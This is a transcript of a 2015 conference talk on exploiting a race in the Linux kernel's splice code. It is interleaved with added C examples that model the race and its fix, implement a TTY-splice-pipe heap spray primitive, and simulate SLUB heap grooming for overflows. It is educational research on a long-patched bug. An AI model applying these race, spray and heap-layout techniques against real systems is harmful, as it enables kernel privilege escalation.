CONFidence 2015: When something overflowing... - Peter Hlavaty
TRANSCRIPT
Slide 1
SPLICE™
When is something overflowing
Slide 2
Agenda, step by step:
• Introduction
• Log
• PoC
• Bug
• More problems
• Stack overflow
• Buffer overflow
• Overflowing too much
• No data problem
• Memory pools and SLUB
Slide 3
#trinity #race condition
#2012 #< 3.4.67
#most of droids 2014
https://lkml.org/lkml/2012/6/6/713
Date: Wed, 6 Jun 2012 22:51:17 -0400
From: Dave Jones <>
Subject: vmsplice triggering bug in kfree.
Slide 4
PoC
https://lkml.org/lkml/2012/6/7/156
RACE:
fcntl => pipe_set_size
vmsplice / splice => do_splice
Slide 5
BUG - RACE
Multiple accesses to pipe->buffers
No locks present
Fast alloc => from stack
Big alloc => from heap
Race to confuse its origin!
Slide 6
Not an issue in one function only!
Slide 7
default_file_splice_read
@race, @controlled content, @stack overflow, @buffer overflow
Slide 8
Slide 9
Stack overflow options
1. No canaries!
2. Attack LR => PC
3. Target params!
4. Target locals
5. …
6. Fail on splice shrink
Slide 10
Stack attack revival!!
1. Let pipe->buffers be small == stack alloc
2. Race pipe->buffers before the kmalloc of vec => aka vec = kmalloc
3. Race again, before splice shrink!
4. Pwn the stack by spd.pages!
5. …
6. Need to handle the stack layout per ROM, sometimes not possible – aka bad layout
7. FAIL most of the time, 2 races in a short time! 99.9999999%
Slide 11
WHAT NEXT?
Slide 12
BUFFER OVERFLOW
@kernel pool, @SLUB, @pipe_set_size, @kmalloc
Slide 13
Let's do pool overflow! (SLUB)
Tactic
1. pipe->buffers > PIPE_DEF_BUFFERS
   means no panic on kfree!
2. race pipe->buffers to be bigger than the value passed to kmalloc
   means overflow
3. read our controlled content (kernel_readv)
4. pwn some data adjacent to the kmalloced buffer
   the ptr is a kernel one, but the data are controlled
Problems
1. we overflow with IOVEC structures!!
   { KERNEL PTR, 0x1000 }
   Not so nicely controlled, but still controlled enough!
2. we do kmalloc followed by the overflow
   means the targeted buffer should already be positioned!
   kmalloc should return memory right before the targeted buffer
3. we do kmalloc not only for the VEC buffer!
   Multiple overflows!
   Multiple chances to panic!
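The three outcomes the deck has used so far (the kfree of a stack address from the 2012 lkml report, the stack overflow through spd.pages on slide 10, and the kmalloc buffer overflow on this slide) all come from the same thing: the pre-3.5 default_file_splice_read() reads pipe->buffers several times without a lock, and fcntl(F_SETPIPE_SZ) changes it in between. The C below is an added example written for this page, not the speaker's code and not kernel code. It replaces the kernel with four reads of one integer (in splice_grow_spd, at the vec allocation, at the fill loop and in splice_shrink_spd) and lets a "schedule" stand in for whatever the racing fcntl thread achieved before each read; the fixed variant samples the field once, as the upstream fix with nr_pages_max does. PIPE_DEF_BUFFERS = 16 is the kernel's value; the schedules, the collapsing of the fill loop into one read, and the read-point names are the example's assumptions.

```c
/*
 * Userspace replay of the pipe->buffers TOCTOU in default_file_splice_read()
 * (Linux < 3.5). Added example, not kernel code: each read of the racy field is
 * a lookup into a "schedule" so the interleaving is deterministic.
 */
#include <stdio.h>
#include <string.h>

#define PIPE_DEF_BUFFERS 16          /* same constant as the kernel */

/* Points at which the vulnerable function consults pipe->buffers. */
enum { RD_GROW, RD_VEC, RD_LOOP, RD_SHRINK, RD_COUNT };

/* Value pipe->buffers holds at each read; models the racing fcntl thread. */
struct schedule { unsigned buffers_at[RD_COUNT]; };

struct outcome {
    int pages_on_stack;     /* spd.pages / spd.partial live in the on-stack arrays */
    int vec_on_stack;       /* vec == __vec */
    unsigned pages_cap;     /* entries really available in spd.pages */
    unsigned vec_cap;       /* entries really available in vec */
    unsigned filled;        /* entries the fill loop writes ({ kernel ptr, 0x1000 } iovecs) */
    int stack_overflow;     /* fill loop wrote past an on-stack array */
    int heap_overflow;      /* fill loop wrote past a kmalloc'd array */
    int kfree_of_stack;     /* splice_shrink_spd() kfree()s a stack address */
};

/* Pre-fix logic: every decision re-reads the racy field. */
static struct outcome splice_read_vulnerable(const struct schedule *s, unsigned want_pages)
{
    struct outcome o;
    memset(&o, 0, sizeof o);

    /* splice_grow_spd(): small -> stack arrays, big -> kmalloc(pipe->buffers * ...) */
    unsigned b = s->buffers_at[RD_GROW];
    o.pages_on_stack = (b <= PIPE_DEF_BUFFERS);
    o.pages_cap = o.pages_on_stack ? PIPE_DEF_BUFFERS : b;

    /* vec = __vec; if (pipe->buffers > PIPE_DEF_BUFFERS) vec = kmalloc(...) */
    b = s->buffers_at[RD_VEC];
    o.vec_on_stack = (b <= PIPE_DEF_BUFFERS);
    o.vec_cap = o.vec_on_stack ? PIPE_DEF_BUFFERS : b;

    /* for (i = 0; i < pipe->buffers && len && ...; i++) { vec[i] = ...; spd.pages[i] = ...; }
     * The real loop re-reads the field every iteration; one read is enough here. */
    b = s->buffers_at[RD_LOOP];
    o.filled = want_pages < b ? want_pages : b;
    if (o.filled > o.pages_cap) {
        if (o.pages_on_stack) o.stack_overflow = 1; else o.heap_overflow = 1;
    }
    if (o.filled > o.vec_cap) {
        if (o.vec_on_stack) o.stack_overflow = 1; else o.heap_overflow = 1;
    }

    /* splice_shrink_spd(): if (pipe->buffers <= PIPE_DEF_BUFFERS) return; kfree(spd->pages); ... */
    b = s->buffers_at[RD_SHRINK];
    if (b > PIPE_DEF_BUFFERS && o.pages_on_stack)
        o.kfree_of_stack = 1;   /* "vmsplice triggering bug in kfree" */
    return o;
}

/* Post-fix logic: pipe->buffers is sampled once (ACCESS_ONCE into spd.nr_pages_max)
 * and every later decision uses that copy. */
static struct outcome splice_read_fixed(const struct schedule *s, unsigned want_pages)
{
    struct schedule once;
    unsigned snapshot = s->buffers_at[RD_GROW];
    for (int i = 0; i < RD_COUNT; i++)
        once.buffers_at[i] = snapshot;
    return splice_read_vulnerable(&once, want_pages);
}

/* The three interleavings the slides rely on (assumed, illustrative values). */
static const struct schedule stack_attack  = {{16, 64, 64, 16}};  /* slide 10: stack alloc, then grow, shrink again */
static const struct schedule pool_overflow = {{32, 32, 256, 32}}; /* slide 13: kmalloc(32), loop bound 256 */
static const struct schedule kfree_crash   = {{16, 16, 16, 64}};  /* the 2012 lkml report */

int main(void)
{
    const struct schedule *sch[] = { &stack_attack, &pool_overflow, &kfree_crash };
    const char *name[] = { "stack attack", "pool overflow", "kfree crash" };
    for (int i = 0; i < 3; i++) {
        struct outcome v = splice_read_vulnerable(sch[i], 256);
        struct outcome f = splice_read_fixed(sch[i], 256);
        printf("%-14s vulnerable: stack=%d heap=%d kfree=%d | fixed: stack=%d heap=%d kfree=%d\n",
               name[i], v.stack_overflow, v.heap_overflow, v.kfree_of_stack,
               f.stack_overflow, f.heap_overflow, f.kfree_of_stack);
    }
    return 0;
}
```

The point the model makes visible is that the allocation-site decision and the loop bound are separate reads, so the attacker does not need to win one race but to land two changes of pipe->buffers in the right windows (the "2 races in short time" of slide 10); the snapshot version removes the second window entirely.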
Slide 14
default_file_splice_read
struct iovec *vec;
struct splice_pipe_desc {
struct page **pages;
struct partial_page *partial;
…
}
POSSIBLE TO EXIT SOONER!
"/dev/null"
GOOD: reduces the overflowing buffers to
- vec: struct iovec (size == 8)
- spd.pages: struct page * (size == 4)
BAD: different SLAB
=> not the following buffers, we overflow something different
=> kfree_skb problem!!
Slide 15
BUT! DATA CONTENT PROBLEM! WTF, we exit too soon due to an error on the data read, no controlled data anymore?
Slide 16
NEW POOL SPRAY?
default_file_splice_read
.. AGAIN ..
Slide 17
POOL SPRAY NOT SO EASY
1. You have to ship data to a pipe
2. With splice
3. Splice has to use default_file_splice_read
4. /dev/ptmx a.k.a. TTY
5. You can load data into the TTY
6. Splice to the pipe
7. Read from the pipe

1. We have just a limited number of TTYs == 0x1fd to be exact
2. Not enough for a pool spray, but not necessary anyway: repeat!!
3. avoiding memory pressure as a side effect!
Slide 18
NEW POOL SPRAY!
NO MEMORY PRESSURE!
CONTROLLED DATA!
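The seven steps on slide 17, as they are actually typed on a Linux box: open a pty pair, write the payload to the slave (that is the "load data into the TTY" step), splice the master into a pipe, and read the pipe back. The tty has no splice_read of its own, so the kernel serves the splice through its generic copy path, which in 2015 was default_file_splice_read() (it has since been reworked and renamed, but the syscall sequence is unchanged). This is an added example written for this page, not the speaker's spray code. It assumes a Linux kernel with /dev/ptmx available and uses raw ioctls and syscall(SYS_splice) instead of the glibc pty helpers so that it builds with default feature macros; the F_SETPIPE_SZ value 1031 is the kernel's. On a patched kernel nothing overflows, so what it demonstrates is the plumbing that drives the kernel-side allocations, not the bug.

```c
/* TTY -> splice -> pipe round trip: the spray primitive from slide 17.
 * Added example for this page, not the speaker's code. Linux only. */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <termios.h>
#include <unistd.h>

#ifndef F_SETPIPE_SZ
#define F_SETPIPE_SZ 1031            /* F_LINUX_SPECIFIC_BASE + 7 */
#endif

/* Open a master/slave pty pair with plain ioctls (no posix_openpt/ptsname),
 * so the file builds with default feature macros. Returns 0 on success. */
static int open_pty_pair(int *master, int *slave)
{
    int m = open("/dev/ptmx", O_RDWR | O_NOCTTY);
    if (m < 0) return -1;
    int unlock = 0, num;
    if (ioctl(m, TIOCSPTLCK, &unlock) < 0 || ioctl(m, TIOCGPTN, &num) < 0) { close(m); return -1; }
    char path[32];
    snprintf(path, sizeof path, "/dev/pts/%d", num);
    int s = open(path, O_RDWR | O_NOCTTY);
    if (s < 0) { close(m); return -1; }
    *master = m; *slave = s;
    return 0;
}

/* Push `msg` through slave -> master -> splice -> pipe -> read into `out`.
 * Returns the number of bytes read back, or -1 on any failure. */
static ssize_t tty_splice_roundtrip(const char *msg, char *out, size_t cap)
{
    size_t len = strlen(msg);
    int master, slave, pfd[2];
    if (len == 0 || len > cap || open_pty_pair(&master, &slave) < 0) return -1;
    if (pipe(pfd) < 0) { close(slave); close(master); return -1; }

    /* Raw mode on the slave so OPOST does not rewrite the payload (e.g. \n -> \r\n). */
    struct termios t;
    if (tcgetattr(slave, &t) == 0) { cfmakeraw(&t); tcsetattr(slave, TCSANOW, &t); }

    /* The fcntl that raced against splice in 2012. On a patched kernel it only
     * selects pipe->buffers, and with it the size class of the vec/pages kmallocs. */
    fcntl(pfd[1], F_SETPIPE_SZ, 64 * 4096);

    ssize_t got = -1;
    if (write(slave, msg, len) == (ssize_t)len) {        /* 5. load data into the TTY */
        size_t done = 0;
        got = 0;
        while (done < len) {
            /* 6. splice master -> pipe; data may arrive from the pty in pieces */
            long n = syscall(SYS_splice, master, NULL, pfd[1], NULL, len - done, 0);
            if (n <= 0) { got = -1; break; }
            ssize_t r = read(pfd[0], out + done, (size_t)n);  /* 7. read from the pipe */
            if (r != n) { got = -1; break; }
            done += (size_t)r;
            got = (ssize_t)done;
        }
    }
    close(pfd[0]); close(pfd[1]); close(slave); close(master);
    return got;
}

int main(void)
{
    char buf[128];
    const char *msg = "controlled data for the pool";   /* constructed sample payload */
    ssize_t n = tty_splice_roundtrip(msg, buf, sizeof buf);
    if (n < 0) { perror("roundtrip"); return 1; }
    printf("%zd bytes back: %.*s\n", n, (int)n, buf);
    return 0;
}
```

Repeating the function in a loop is the "repeat!!" of slide 17: each round drains the pipe, so the same handful of ptys can be reused without holding memory, which is why the spray puts no pressure on the system.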
Slide 19
SPRAY implementation
Why design matters #1
Slide 20
VULN implementation
Why design matters #2
Slide 21
Overflows vs Kernel Pool
SLUB
Randomization, but chosen mainly from the last SLAB
SLAB organized by size: similar-sized objects are covered by the same SLAB
Slide 22
Probe and pwn!
1. choose two semi-controlled objects
2. Target and Victim
3. Should be covered by the same SLAB
4. Fill many SLABs with Target
5. Free one Target per SLAB
6. Try to fill the holes with Victim
7. Trigger an over/underflow from Victim to hit Target
8. pwn
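Steps 4 to 7 above can be replayed against a toy cache to see why the recipe puts every Victim directly in front of a Target. The C below is an added example written for this page, not the speaker's code and not SLUB: it assumes a deliberately simplified cache (fixed-size slots grouped into slabs, a per-slab LIFO free list, and the slab that most recently gained a hole served first). That "a freed slot is the next one handed out for that size class" is exactly what the probe step has to confirm on a real kernel; real SLUB adds per-CPU slabs and free-list randomisation, which is the "randomization, but mainly from the last SLAB" of slide 21. The slab size, the hole position and the T/V rendering are the example's own choices.

```c
/* Toy SLUB-like cache for replaying "Probe and pwn". Added example for this
 * page, not the speaker's code; the allocator is a simplification, not SLUB. */
#include <stdio.h>
#include <string.h>

#define OBJS_PER_SLAB 8
#define MAX_SLABS     16

enum kind { FREE = 0, TARGET, VICTIM };

struct slab {
    enum kind slot[OBJS_PER_SLAB];
    int freelist[OBJS_PER_SLAB];    /* LIFO stack of free slot indices */
    int nfree;
};

struct cache {
    struct slab slabs[MAX_SLABS];
    int nslabs;
    int partial;                    /* slab allocations are served from first, -1 if none */
};

struct obj { int slab, slot; };

static int new_slab(struct cache *c)
{
    if (c->nslabs == MAX_SLABS) return -1;
    struct slab *s = &c->slabs[c->nslabs];
    for (int i = OBJS_PER_SLAB - 1; i >= 0; i--)   /* pushed in reverse: slot 0 goes out first */
        s->freelist[s->nfree++] = i;
    return c->nslabs++;
}

static struct obj cache_alloc(struct cache *c, enum kind k)
{
    struct obj o = { -1, -1 };
    int idx = c->partial;
    if (idx < 0 || c->slabs[idx].nfree == 0) {
        idx = -1;
        for (int i = 0; i < c->nslabs; i++)        /* any slab with a hole, else grow */
            if (c->slabs[i].nfree) { idx = i; break; }
        if (idx < 0) idx = new_slab(c);
        if (idx < 0) return o;
    }
    struct slab *s = &c->slabs[idx];
    o.slab = idx;
    o.slot = s->freelist[--s->nfree];
    s->slot[o.slot] = k;
    c->partial = s->nfree ? idx : -1;
    return o;
}

static void cache_free(struct cache *c, struct obj o)
{
    struct slab *s = &c->slabs[o.slab];
    s->slot[o.slot] = FREE;
    s->freelist[s->nfree++] = o.slot;
    c->partial = o.slab;            /* the slab that just gained a hole is tried next */
}

/* Steps 4-7 over `nslabs` slabs, punching the hole at `hole_slot`. Returns how
 * many Victims have a Target directly behind them, i.e. how many overflows out
 * of a Victim would land on a Target. If `layout` is non-NULL it receives slab 0
 * rendered as T/V/. characters (OBJS_PER_SLAB + 1 bytes). */
static int probe_and_pwn(int nslabs, int hole_slot, char *layout)
{
    struct cache c;
    struct obj targets[MAX_SLABS][OBJS_PER_SLAB];
    memset(&c, 0, sizeof c);
    c.partial = -1;
    if (nslabs > MAX_SLABS) nslabs = MAX_SLABS;

    for (int i = 0; i < nslabs; i++)              /* 4. fill many slabs with Target */
        for (int j = 0; j < OBJS_PER_SLAB; j++)
            targets[i][j] = cache_alloc(&c, TARGET);

    for (int i = 0; i < nslabs; i++)              /* 5. free one Target per slab */
        cache_free(&c, targets[i][hole_slot]);

    int hits = 0;
    for (int i = 0; i < nslabs; i++) {            /* 6. fill the holes with Victim */
        struct obj v = cache_alloc(&c, VICTIM);
        if (v.slab < 0) break;
        /* 7. an overflow out of the Victim runs into slot + 1 of the same slab */
        if (v.slot + 1 < OBJS_PER_SLAB && c.slabs[v.slab].slot[v.slot + 1] == TARGET)
            hits++;
    }
    if (layout) {
        for (int j = 0; j < OBJS_PER_SLAB; j++)
            layout[j] = c.slabs[0].slot[j] == TARGET ? 'T' : c.slabs[0].slot[j] == VICTIM ? 'V' : '.';
        layout[OBJS_PER_SLAB] = '\0';
    }
    return hits;
}

int main(void)
{
    char row[OBJS_PER_SLAB + 1];
    int hits = probe_and_pwn(4, 3, row);
    printf("hole in slot 3:    slab 0 = %s, %d/4 victims overflow into a Target\n", row, hits);
    hits = probe_and_pwn(4, OBJS_PER_SLAB - 1, row);
    printf("hole in last slot: slab 0 = %s, %d/4 victims overflow into a Target\n", row, hits);
    return 0;
}
```

The second run shows the caveat a practitioner wants: punching the hole in the last slot of a slab makes the overflow cross into the next page, where the model (and a real kernel) gives no guarantee about the neighbour, so the hole position is part of the design of the spray, not just the object choice.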
Slide 23
Memory object separation
• Linux kernel – caches
  • many times an object-specific cache
  • But a cache can be fully filled as well
  • Then a new one needs to be allocated
  • Cache reallocation can be played with!
  • Not as easy as with normal objects, but doable ..
• Windows kernel – sessions
  • Many powerful objects in the same session
  • Choose one of them & pwn
Slide 24
POWER lies in DESIGN
Full control over kmalloc & kfree
Control (at least semi!) over the object content
Objects contain plain *pointers* and members
No integrity checks on member state
No effective sentinels (page_noaccess) between objects / memory chunks, even on 64-bit!
Limited randomization - every time the same chunk base
http://www.slideshare.net/PeterHlavaty/back-to-the-core
Slide 25
SPLICE not done yet …
What's COVERED BY THE PRESO
Race no problem
Reduced overflow to 2 buffers (vec, pages)
Spray to fill data to a controlled state
Play with SLUB
TODO OWN RESEARCH
WHAT is our TARGET?
EXEC?
PXN?
PAN & arm64?
Slide 26
Hint: kmalloc and pipe_set_size
We set the sizes for kmalloc through pipe_set_size
pipe_set_size (->buffers) is limited to some sizes:
1, 2, 4, 8, 0x10, 0x20, 0x40, 0x80, 0x100
That's all!
We are not interested in the content of the pipe, just in pipe->buffers, because …
kmalloc takes those sizes and multiplies them by sizeof(iovec)!
Only these sizes go to kmalloc (above PIPE_DEF_BUFFERS == 0x10):
0x20, 0x40, 0x80, 0x100
Results in the following kmallocs:
0x80, 0x100, 0x200, 0x400
(Those four sizes are buffers * 4, i.e. the spd.pages array of 4-byte struct page * pointers from slide 14; with sizeof(struct iovec) == 8 the vec allocation is twice that, 0x100 .. 0x800, so check which of the two buffers you are lining up against a given SLAB.)
Some techniques are necessary here!
For the TTY, tty_buffer was used, size in the 0x400 SLAB, cool!
But there is magic in there, and we scatter it because of the pattern
{ KERNEL PTR, 0x1000 }
Some other candidates?
Slide 27
btw. Software Security!
.. a tale about a calculator: how some guys protect others ..
Slide 28
Attack chain
• Social engineering
• Vulnerability
Attack vector
• Killing 0days: proactive solution!
Prevent automatic malware install
• Cure the after-effects
Dissecting malware
If proactive fails
A targeted attack has already won here!
Slide 29
Aftermath
Low hanging fruits
Popping calcs
Good luck …
Slide 30
https://twitter.com/JohnLaTwC/status/601101229939294208/photo/1
Slide 31
.. shameless plug ..
#whoarewe
Slide 32
KEEN TEAM - TIMELINE
before 2010, 2010.7, 2010-2012
Pwn2Own 2013, Pwn2Own 2014
Emergency experts
Global Platinum prize, XP Guard Security Alliance
GeekPwn 2014
Evaluation, CNMSRC founding team
2013.11, 2014.2, 2014.3, 2014.10
Project Zero
2014.12
Tesla recognition
2014.11
Pwn2Own 2015
2015.3, 2015.4
CodeGate CTF – 0ops
Slide 33
KEEN TEAM - GEEKS
http://forum.xda-developers.com/galaxy-s6/general/root-pingpongroot-s6-root-tool-t3103016/post60600131
PINGP0NG ROOT
wushi (@team509)
memeda (@antlr7)
idl3r (xda: idler1984)
Qoobee (@EvilLeoC)
@K33nTeam
Slide 34
KEEN TEAM - TECHNIQUES
Isolated heap bypass [ blog – MS14-056 ]
CC-shellcoding framework [ nosuchcon ]
Webkit exploitation [ cansecwest ]
VadRoot (vm_area) + PageTable pwn [ syscan ]
Pool spray tech [ confidence ]
1bit flip - kernel escape (kernel code exec) [ recon ]
Slide 35
KEEN TEAM - KNOWLEDGE
ten months highlights
* multiple presentations at Chinese domestic conferences & lectures at universities not listed here
Slide 36
10.24.2015
Pick a device, name your own challenge!
Slide 37
Thank You!
Q & A
@K33nTeam
hr (at) keencloudtech.com
We are hiring! :) Interns wanted!